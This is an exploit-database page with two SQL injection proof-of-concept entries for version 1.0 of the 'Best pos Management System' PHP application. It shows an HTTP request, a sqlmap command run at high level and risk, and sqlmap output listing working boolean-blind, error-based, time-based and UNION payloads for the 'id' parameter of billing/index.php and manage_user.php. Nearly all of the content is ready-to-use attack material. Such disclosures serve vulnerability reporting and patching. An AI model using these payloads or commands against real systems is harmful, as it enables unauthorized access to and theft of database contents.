Share
## https://sploitus.com/exploit?id=PACKETSTORM:171039
# Exploit Title: SQL Injection on Best pos Management System  
# Google Dork: NA  
# Date: 14/2/2023  
# Exploit Author: Ahmed Ismail (@MrOz1l)  
# Vendor Homepage:  
https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html  
# Software Link:  
https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip  
# Version: 1.0  
# Tested on: Windows 11  
# CVE : NA  
  
```  
  
GET /kruxton/billing/index.php?id=9 HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)  
Gecko/20100101 Firefox/109.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Referer: http://localhost/kruxton/index.php?page=orders  
Cookie: PHPSESSID=61ubuj4m01jk5tibc7banpldao  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
  
```  
  
  
# Payload  
  
GET parameter 'id' is vulnerable. Do you want to keep testing the  
others (if any)? [y/N] N  
sqlmap identified the following injection point(s) with a total of 58  
HTTP(s) requests:  
---  
Parameter: id (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: id=9 AND 4017=4017  
  
Type: error-based  
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or  
GROUP BY clause (FLOOR)  
Payload: id=9 OR (SELECT 7313 FROM(SELECT  
COUNT(*),CONCAT(0x7162767171,(SELECT  
(ELT(7313=7313,1))),0x7178707671,FLOOR(RAND(0)*2))x FROM  
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: id=9 AND (SELECT 5871 FROM (SELECT(SLEEP(5)))rwMY)  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 6 columns  
Payload: id=-9498 UNION ALL SELECT  
NULL,NULL,NULL,NULL,CONCAT(0x7162767171,0x53586b446c4c75556d48544175547856636d696171464e624c6572736f55415246446a4b56777749,0x7178707671),NULL--  
-  
---  
[19:33:33] [INFO] the back-end DBMS is MySQL  
web application technology: PHP 8.0.25, Apache 2.4.54  
back-end DBMS: MySQL >= 5.0 (MariaDB fork)  
```  
  
  
  
----------------------------  
  
  
  
  
# Exploit Title: SQL Injection on Best pos Management System  
# Google Dork: NA  
# Date: 17/2/2023  
# Exploit Author: Ahmed Ismail (@MrOz1l)  
# Vendor Homepage:  
https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html  
# Software Link:  
https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip  
# Version: 1.0  
# Tested on: Windows 11  
# CVE : NA  
  
  
_________  
python sqlmap.py -u "http://localhost/kruxton/manage_user.php?id=4*"  
--dbms=mysql --level 3 --risk 3 --dbs --fresh-queries  
  
  
URI parameter '#1*' is vulnerable. Do you want to keep testing the  
others (if any)? [y/N] N  
sqlmap identified the following injection point(s) with a total of 52  
HTTP(s) requests:  
---  
Parameter: #1* (URI)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: http://localhost:80/kruxton/manage_user.php?id=4  
<http://localhost/kruxton/manage_user.php?id=4> AND 6332=6332  
  
Type: error-based  
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or  
GROUP BY clause (FLOOR)  
Payload: http://localhost:80/kruxton/manage_user.php?id=4  
<http://localhost/kruxton/manage_user.php?id=4> OR (SELECT 6586  
FROM(SELECT COUNT(*),CONCAT(0x716a6b6a71,(SELECT  
(ELT(6586=6586,1))),0x7170787871,FLOOR(RAND(0)*2))x FROM  
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: http://localhost:80/kruxton/manage_user.php?id=4  
<http://localhost/kruxton/manage_user.php?id=4> AND (SELECT 3605 FROM  
(SELECT(SLEEP(5)))zHgC)  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 5 columns  
Payload: http://localhost:80/kruxton/manage_user.php?id=-1830  
<http://localhost/kruxton/manage_user.php?id=-1830> UNION ALL SELECT  
NULL,NULL,CONCAT(0x716a6b6a71,0x4b5276534542756c4e596a4f7377506a73517a73544b4e44737946636674736c526c775277594976,0x7170787871),NULL,NULL--  
-  
---  
[10:58:18] [INFO] the back-end DBMS is MySQL  
web application technology: PHP, Apache 2.4.54, PHP 8.0.25  
back-end DBMS: MySQL >= 5.0 (MariaDB fork)